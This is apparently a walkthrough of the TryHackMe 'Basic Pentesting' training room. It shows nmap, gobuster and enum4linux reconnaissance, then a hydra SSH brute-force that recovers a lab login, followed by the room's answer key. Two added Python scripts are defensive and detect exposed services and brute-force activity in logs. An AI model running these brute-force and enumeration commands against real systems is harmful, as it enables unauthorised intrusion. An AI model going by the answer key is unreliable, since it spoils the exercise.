Hello Friend

Intro

In this challenge you will learn how a penetration test is performed on a web application. You will also go through the process of information gathering, vulnerability scanning, exploitation, and post-exploitation analysis using tools such as hydra, gobuster, nmap and many more.

Room Link: https://tryhackme.com/room/basicpentestingjt

⚠️Tools used:
> Ping
> Nmap
> Gobuster
> Enum4linux
> Hydra

Ping scan

Run a ping scan to check whether the host is reachable at the given IP address.
command:ping 10.10.164.240

┌──(sumit㉿mr-nob0dy)-[~/ctf/tryhackme/basic-pentesting]
└─$ ping 10.10.164.240
PING 10.10.164.240 (10.10.164.240) 56(84) bytes of data.
64 bytes from 10.10.164.240: icmp_seq=1 ttl=63 time=192 ms
64 bytes from 10.10.164.240: icmp_seq=2 ttl=63 time=187 ms
64 bytes from 10.10.164.240: icmp_seq=3 ttl=63 time=396 ms
64 bytes from 10.10.164.240: icmp_seq=4 ttl=63 time=271 ms
64 bytes from 10.10.164.240: icmp_seq=5 ttl=63 time=191 ms
64 bytes from 10.10.164.240: icmp_seq=6 ttl=63 time=190 ms
^C
--- 10.10.164.240 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5002ms
rtt min/avg/max/mdev = 187.244/237.909/396.222/76.726 ms

Nmap

Now run an nmap scan to find out which ports are open. First create an nmap directory, then run nmap with -oN so the result is stored in a file instead of only on the screen. Note that the -oN path is relative to the directory you run nmap from; in the session below the scan is run from the basic-pentesting directory, so the file ends up at nmap/basic-pentesting.
command:mkdir nmap
command:cd nmap
command:nmap -sV -oN nmap/basic-pentesting 10.10.164.240

Command breakdown:

  • -sV : service and version detection.
  • -oN : write the scan output in nmap's normal (human-readable) format to the given file.
┌──(sumit㉿mr-nob0dy)-[~/ctf/tryhackme/basic-pentesting]
└─$ nmap -sV -oN nmap/basic-pentesting 10.10.164.240
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 23:17 IST
Nmap scan report for 10.10.164.240
Host is up (0.19s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.82 seconds

The scan shows the following open ports; the rest of this walkthrough works with 22, 80, 139 and 445:

22 (SSH)
80 (HTTP, Apache)
139 (SMB)
445 (SMB)
8009 (AJP)
8080 (HTTP, Tomcat)
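Once a scan has been written to a file with -oN, the open-port table can be pulled out programmatically instead of being read by eye. The following is an added example (not part of the original write-up) that parses the normal-format output shown above, which is embedded verbatim so the script runs offline, and attaches a hardening note to services that an administrator would usually expect to be firewalled or bound to localhost. The service categories in INTERNAL_ONLY are general hardening guidance assumed for the example, not findings about this host.

```python
import re
from typing import Dict, List, Tuple

# nmap -oN output copied from the scan above so the example runs without a live host.
NMAP_OUTPUT = """\
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 23:17 IST
Nmap scan report for 10.10.164.240
Host is up (0.19s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port line of the -oN table: "22/tcp   open  ssh   OpenSSH 7.2p2 ..." (version is optional).
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)


def parse_nmap_normal(text: str) -> Dict[int, Tuple[str, str, str]]:
    """Return {port: (protocol, service, version)} for every line whose state is 'open'."""
    ports: Dict[int, Tuple[str, str, str]] = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group("state") != "open":
            continue
        version = (m.group("version") or "").strip()
        ports[int(m.group("port"))] = (m.group("proto"), m.group("service"), version)
    return ports


# Assumed hardening guidance per service name (general categories, not results for this box).
INTERNAL_ONLY = {
    "ajp13": "AJP connector: normally only needed by a reverse proxy on the same host, so firewall it",
    "netbios-ssn": "SMB: restrict to the LAN or to the specific clients that need it",
}


def exposure_notes(ports: Dict[int, Tuple[str, str, str]]) -> List[str]:
    """List the open ports whose service falls in a category that usually should not be reachable."""
    notes = []
    for port, (proto, service, _version) in sorted(ports.items()):
        if service in INTERNAL_ONLY:
            notes.append(f"{port}/{proto} {service}: {INTERNAL_ONLY[service]}")
    return notes


if __name__ == "__main__":
    found = parse_nmap_normal(NMAP_OUTPUT)
    for port, (proto, service, version) in sorted(found.items()):
        print(f"{port}/{proto:<4} {service:<12} {version}")
    for note in exposure_notes(found):
        print("review:", note)
```

The parser deliberately keys on the STATE column rather than on the word "open" appearing anywhere, so lines such as "Not shown: 994 closed tcp ports" are ignored; the same function works on any -oN file because the column layout is fixed.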

Finding hidden directories

To find hidden directories on the web server we use gobuster in directory mode. It needs the target URL and a wordlist; here we use directory-list-2.3-medium.txt, the DirBuster wordlist that ships with Kali under /usr/share/wordlists/dirbuster/ (a copy stored under ~/ctf is used in the command below).
command:gobuster dir -u http://10.10.164.240/ -w /home//sumit/ctf/directory-list-2.3-medium.txt

┌──(sumit㉿mr-nob0dy)-[~/ctf/tryhackme/basic-pentesting]
└─$ gobuster dir -u http://10.10.164.240/ -w /home//sumit/ctf/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.164.240/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home//sumit/ctf/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/development          (Status: 301) [Size: 320] [--> http://10.10.164.240/development/]
Progress: 1035 / 220561 (0.47%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 1036 / 220561 (0.47%)
===============================================================
Finished
===============================================================

Enum4linux

enum4linux enumerates the SMB service (ports 139 and 445) for shares, users and password policy; the -a option runs all of its simple enumeration checks. The relevant part of the output lists two local users, kay and jan:
command:enum4linux -a 10.10.164.240

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''

Hydra

With the username from enum4linux, brute-force the SSH login with hydra: -l gives a single username, -P the password wordlist (rockyou.txt), and ssh://10.10.164.240 the service and host to test.
command:hydra -l jan -P /home/sumit/ctf/rockyou.txt ssh://10.10.164.240

[STATUS] 92.00 tries/min, 276 tries in 00:03h, 14344125 to do in 2598:35h, 13 active
[STATUS] 91.71 tries/min, 642 tries in 00:07h, 14343759 to do in 2606:37h, 13 active
[22][ssh] host: 10.10.164.240   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-08 23:05:10
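Both the gobuster run above and this hydra run leave a very recognisable trail on the target: a burst of HTTP 404s from one client in the Apache access log, and a burst of "Failed password" lines for one source in the sshd auth log. The following is an added example (not part of the original write-up) showing how a defender detects both with the same sliding-window count. The log lines are constructed for the example (the host name, IPs, PIDs and timestamps are made up); the thresholds are assumptions, not values taken from any tool.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, Iterable, List, Tuple

# Constructed sshd auth.log lines: 12 failures in 11 seconds from one source, one stray failure
# and one successful login from another source.
SSH_LOG: List[str] = [
    f"Oct  8 23:01:{12 + i:02d} basic2 sshd[{2000 + i}]: Failed password for jan from 10.10.1.5 port {51000 + i} ssh2"
    for i in range(12)
] + [
    "Oct  8 23:05:40 basic2 sshd[2100]: Failed password for invalid user admin from 10.10.1.9 port 40001 ssh2",
    "Oct  8 23:06:02 basic2 sshd[2101]: Accepted password for kay from 10.10.1.9 port 40002 ssh2",
]

# Constructed Apache combined-format lines: eight 404s in eight seconds from one client,
# one redirect from the same client, one normal request from a different client.
WEB_LOG: List[str] = [
    f'10.10.1.5 - - [08/Oct/2023:23:10:{i:02d} +0530] "GET /{w} HTTP/1.1" 404 275 "-" "gobuster/3.6"'
    for i, w in enumerate(["admin", "backup", "cgi-bin", "images", "js", "old", "test", "uploads"])
] + [
    '10.10.1.5 - - [08/Oct/2023:23:10:08 +0530] "GET /development HTTP/1.1" 301 320 "-" "gobuster/3.6"',
    '10.10.1.7 - - [08/Oct/2023:23:11:30 +0530] "GET / HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

SSH_FAIL = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
APACHE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_syslog_ts(line: str, year: int) -> datetime:
    """Syslog timestamps ("Oct  8 23:01:12") carry no year, so the caller supplies it."""
    return datetime.strptime(f"{year} {line[:15]}", "%Y %b %d %H:%M:%S")


def bursts(events: Iterable[Tuple[str, datetime]], threshold: int, window_seconds: int) -> Dict[str, int]:
    """Group events by key and return {key: peak_count} for every key that reached
    `threshold` events inside some sliding window of `window_seconds`."""
    per_key: Dict[str, List[datetime]] = defaultdict(list)
    for key, ts in events:
        per_key[key].append(ts)
    flagged: Dict[str, int] = {}
    for key, times in per_key.items():
        times.sort()
        window: deque = deque()
        peak = 0
        for t in times:
            window.append(t)
            while (t - window[0]).total_seconds() > window_seconds:
                window.popleft()  # drop events that fell out of the window
            peak = max(peak, len(window))
        if peak >= threshold:
            flagged[key] = peak
    return flagged


def ssh_bruteforce_sources(lines: Iterable[str], year: int = 2023,
                           threshold: int = 10, window_seconds: int = 60) -> Dict[str, int]:
    """Sources with `threshold` or more failed SSH logins within `window_seconds`."""
    events = [(m.group("ip"), parse_syslog_ts(line, year))
              for line in lines if (m := SSH_FAIL.search(line))]
    return bursts(events, threshold, window_seconds)


def web_scan_sources(lines: Iterable[str], threshold: int = 5, window_seconds: int = 60) -> Dict[str, int]:
    """Clients with `threshold` or more HTTP 404 responses within `window_seconds`."""
    events = []
    for line in lines:
        m = APACHE.match(line)
        if m and m.group("status") == "404":
            events.append((m.group("ip"), datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")))
    return bursts(events, threshold, window_seconds)


if __name__ == "__main__":
    print("ssh brute-force sources:", ssh_bruteforce_sources(SSH_LOG))
    print("web directory-scan sources:", web_scan_sources(WEB_LOG))
```

The 404 count is the robust signal for directory brute-forcing: the User-Agent string ("gobuster/3.6" in the constructed lines) is trivially changed by the client, so it is only useful as supporting evidence. On the SSH side, the same counting logic is what fail2ban-style tooling automates; the 92 tries/min visible in hydra's STATUS lines above would trip a threshold of 10 failures per minute within the first few seconds.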

Question and Answer

  1. Deploy the machine and connect to our network
    Ans: No answer needed

  2. Find the services exposed by the machine
    Ans: No answer needed

  3. What is the name of the hidden directory on the web server(enter name without /)?
    Ans: development

  4. Use brute-forcing to find the username & password
    Ans: No answer needed

  5. What is the username?
    Ans: jan

  6. What is password?
    Ans: armando

  7. What service do you use to access the server(answer in abbreviation in all caps)?
    Ans: SSH

  8. Enumerate the machine to find any vectors for privilege escalation
    Ans: No answer needed

  9. What is the name of the other user you found(all lower case)?
    Ans: kay

  10. If you have found another user, what can you do with this information?
    Ans: No answer needed

  11. What is the final password you obtain?
    Ans:

Congrats, we have successfully completed the room. I hope you learnt something new…

Thanks for reading…